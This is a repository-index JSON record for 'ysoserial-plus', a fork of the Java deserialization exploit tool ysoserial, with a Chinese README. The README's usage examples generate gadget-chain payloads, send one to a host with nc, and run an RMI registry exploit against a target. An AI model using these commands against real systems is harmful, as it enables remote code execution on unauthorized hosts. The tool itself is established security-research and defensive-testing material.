{"id":25464454,"url":"https://github.com/XiaomingX/ysoserial-plus","last_synced_at":"2025-11-04T00:30:31.300Z","repository":{"id":264210408,"uuid":"892706406","full_name":"XiaomingX/ysoserial-plus","owner":"XiaomingX","description":"ysoserial 最早在 AppSecCali 2015 演讲 \"Marshalling Pickles: how deserializing objects will ruin your day\" 中发布，包含适用于 Apache Commons Collections (3.x 和 4.x)、Spring Beans/Core (4.x) 和 Groovy (2.3.x) 的 gadget 链。后续版本增加了对 JRE \u003c= 1.7u21 和其他常见 Java 库的支持。","archived":false,"fork":false,"pushed_at":"2024-11-22T16:11:37.000Z","size":144,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-11-22T17:20:55.740Z","etag":null,"topics":["exploit","java","security"],"latest_commit_sha":null,"homepage":"https://twitter.com/seclink","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/XiaomingX.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-22T16:09:10.000Z","updated_at":"2024-11-22T16:13:40.000Z","dependencies_parsed_at":"2024-11-22T17:21:20.148Z","dependency_job_id":"476a1ccc-b04f-4b02-9731-6040e7ec0ee0","html_url":"https://github.com/XiaomingX/ysoserial-plus","commit_stats":null,"previous_names":["xiaomingx/ysoserial-plus"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/XiaomingX%2Fysoserial-plus","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/XiaomingX%2Fysoserial-plus/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/XiaomingX%2Fysoserial-plus/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/XiaomingX%2Fysoserial-plus/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/XiaomingX","download_url":"https://codeload.github.com/XiaomingX/ysoserial-plus/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239423272,"owners_count":19636138,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","java","security"],"created_at":"2025-02-18T06:31:29.538Z","updated_at":"2025-11-04T00:30:31.187Z","avatar_url":"https://github.com/XiaomingX.png","language":"Java","funding_links":[],"categories":["Top CVE Exploits and PoCs"],"sub_categories":["Critical CVEs"],"readme":"# ysoserial\n\n[![GitHub 最新版本](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)\n[![Travis 构建状态](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)\n[![Appveyor 构建状态](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)\n[![JitPack](https://jitpack.io/v/frohoff/ysoserial.svg)](https://jitpack.io/#frohoff/ysoserial)\n\n**ysoserial** 是一个用于生成利用 Java 对象反序列化漏洞的有效载荷（payload）的概念验证工具。\n\n## 更新之处\n - 1. java版本更新为支持22版本。\n - 2. 可以使用以下命令自助编译打包。\n```\nmvn package -Dmaven.test.skip=true\n```\n\n\n![logo](ysoserial.png)\n\n---\n\n## 工具简介\n\nysoserial 最早在 AppSecCali 2015 演讲 [\"Marshalling Pickles: how deserializing objects will ruin your day\"](https://frohoff.github.io/appseccali-marshalling-pickles/) 中发布，包含适用于 Apache Commons Collections (3.x 和 4.x)、Spring Beans/Core (4.x) 和 Groovy (2.3.x) 的 gadget 链。后续版本增加了对 [JRE \u003c= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) 和其他常见 Java 库的支持。\n\nysoserial 是一组利用流行 Java 库中的 \"gadget 链\" 的工具集合。这些 gadget 链可以在特定条件下，利用 Java 应用程序中不安全的对象反序列化操作。工具的主要功能是接收用户指定的命令，并通过指定的 gadget 链将其封装，然后将序列化结果输出到标准输出。当目标应用程序具有所需的 gadget 且执行了不安全的反序列化时，会触发命令在目标主机上执行。\n\n**需要注意**：漏洞的根本原因是目标应用程序的不安全反序列化行为，而非 gadget 本身的存在。\n\n---\n\n## 免责声明\n\n此软件仅供学术研究和开发有效防御技术之用。请勿将其用于未经授权的系统攻击。项目维护者对软件的误用不承担任何责任。请负责任地使用。\n\n---\n\n## 使用方法\n\n```shell\n$ java -jar ysoserial.jar\nY SO SERIAL?\nUsage: java -jar ysoserial.jar [payload] '[command]'\n  可用的 payload 类型：\n     Payload             作者                      依赖\n     -------             -------                  ------------\n     AspectJWeaver       @Jang                    aspectjweaver:1.9.2, commons-collections:3.2.2\n     BeanShell1          @pwntester, @cschneider4711 bsh:2.0b5\n     ...\n```\n\n---\n\n## 示例\n\n```shell\n# 使用 CommonsCollections1 生成命令 calc.exe 的 payload\n$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd\n\n# 生成 Groovy1 类型 payload 并保存为文件\n$ java -jar ysoserial.jar Groovy1 calc.exe \u003e groovypayload.bin\n$ nc 10.10.10.10 1099 \u003c groovypayload.bin\n\n# 利用 RMI 注册表漏洞执行 payload\n$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe\n```\n\n---\n\n## 安装\n\n点击下载 [最新发布版本](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)。\n\n---\n\n## 构建\n\n需要 Java 1.7+ 和 Maven 3.x+：\n\n```shell\nmvn clean package -DskipTests\n```\n\n---\n\n## 代码状态\n\n[![构建状态](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)\n[![构建状态](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)\n\n---\n\n## 参与贡献\n\n1. Fork 项目\n2. 创建分支 (`git checkout -b my-new-feature`)\n3. 提交更改 (`git commit -am '添加新功能'`)\n4. 推送到分支 (`git push origin my-new-feature`)\n5. 提交 Pull Request\n\n---\n\n## 相关资源\n\n- [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet)：关于反序列化漏洞的信息、工具、博客等。\n- [marshalsec](https://github.com/frohoff/marshalsec)：针对不同序列化格式/库的类似项目。\n- [ysoserial.net](https://github.com/pwntester/ysoserial.net)：用于 .NET 反序列化的类似项目。\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FXiaomingX%2Fysoserial-plus","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FXiaomingX%2Fysoserial-plus","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FXiaomingX%2Fysoserial-plus/lists"}